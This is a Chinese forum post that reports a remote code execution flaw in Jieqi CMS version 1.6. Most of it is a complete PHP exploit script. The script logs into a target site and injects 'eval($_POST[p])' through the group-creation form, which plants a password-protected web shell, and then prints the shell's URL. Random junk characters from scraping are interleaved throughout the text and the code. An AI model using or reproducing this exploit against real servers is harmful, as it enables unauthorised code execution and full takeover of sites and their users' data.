杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。+ z/ H& ?9 \6 k3 y# {% _
) O% e8 S) m9 ~! t2 W& ?' S+ @4 b
7 [! }! ]8 F5 ? F+ M5 _1 E1 @4 U该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。 {* z# f- l+ b# n. n7 B! a$ J
需要有一个能创建圈子的用户。; F8 C! @* l* A, q1 k3 ^2 o
* o% L% G& w; ] E) O<?php
7 y( X0 w, M* o( {6 {& E q
$ I( g4 G6 h3 h) \print_r('
$ x, e% Y1 H2 [/ G4 ]/ Z( X0 r+---------------------------------------------------------------------------+& {' S; }9 n' t; {8 s
Jieqi CMS V1.6 PHP Code Injection Exploit
2 l# m+ r0 W' cby flyh4t
" V2 O% k" U& W7 M) @$ O: c8 F9 C smail: phpsec at hotmail dot com2 ]" x; ^5 ~: E; ^* V( |. P
team: http://www.wolvez.org
' Y- z" g+ T; O0 w8 `1 g% l+---------------------------------------------------------------------------+, [$ T. L" o& R1 k' W& W* R
'); /**
0 P) |; u* T8 e& q+ ?5 c * works regardless of php.ini settings1 b' i! H9 h( N, A, v; _% u3 ]6 c
*/ if ($argc < 5) { print_r(', M; M& l9 P. p# M
+---------------------------------------------------------------------------+
* [" G; g0 f) H9 z0 _Usage: php '.$argv[0].' host path username
$ ^# j! j1 m+ X9 g0 Vhost: target server (ip/hostname)
" e" R7 ^4 A+ Zpath: path to jieqicms
3 j' G! R& O4 X4 }uasename: a username who can create group
1 F* H$ Z: ^: S0 `, B- yExample:3 g |3 j ~! e D- p& }) E! M
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password( B! W: A& f' i; ~% u7 j
+---------------------------------------------------------------------------+
* ~* C! p5 ]' c' P, a'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
% H: [1 \1 }* d. qContent-Disposition: form-data; name="gname"
! p5 {4 ^& X& F* c9 o- x! T6 A0 d
2 ]! ? E, J% i- P" @7 q9 ~0 |/ ]'; $params .="';"; $params .='eval($_POST[p]);//flyh4t* c0 l' n0 Z( X- [
-----------------------------23281168279961
$ g' Z7 b! q/ A! M& QContent-Disposition: form-data; name="gcatid"9 y. ~8 h: X5 h+ X# w6 Z
! x" ]& B( i, o, L& C" Z1
- r9 v- E0 s$ b/ K* [-----------------------------23281168279961) | Q0 T4 [2 F) i5 O. Y
Content-Disposition: form-data; name="gaudit"
; G( s8 ^7 J0 j# Q8 ^5 G* y 7 I2 W, c M; s! n+ k# C
1
! }, S3 K5 g9 t8 U-----------------------------232811682799613 @+ k& i3 e. s' ^. f- [
Content-Disposition: form-data; name="gbrief"7 i& }$ q; O! I4 y& ?& E
2 U( O- d& F. @ h& t8 j
1/ S+ z0 l: W6 y" v! \
-----------------------------23281168279961--$ _( c9 p N9 Y }; l
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com- T; U: C z3 ]1 m6 H0 l5 H
1 f: ?9 t; z* _3 ppreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对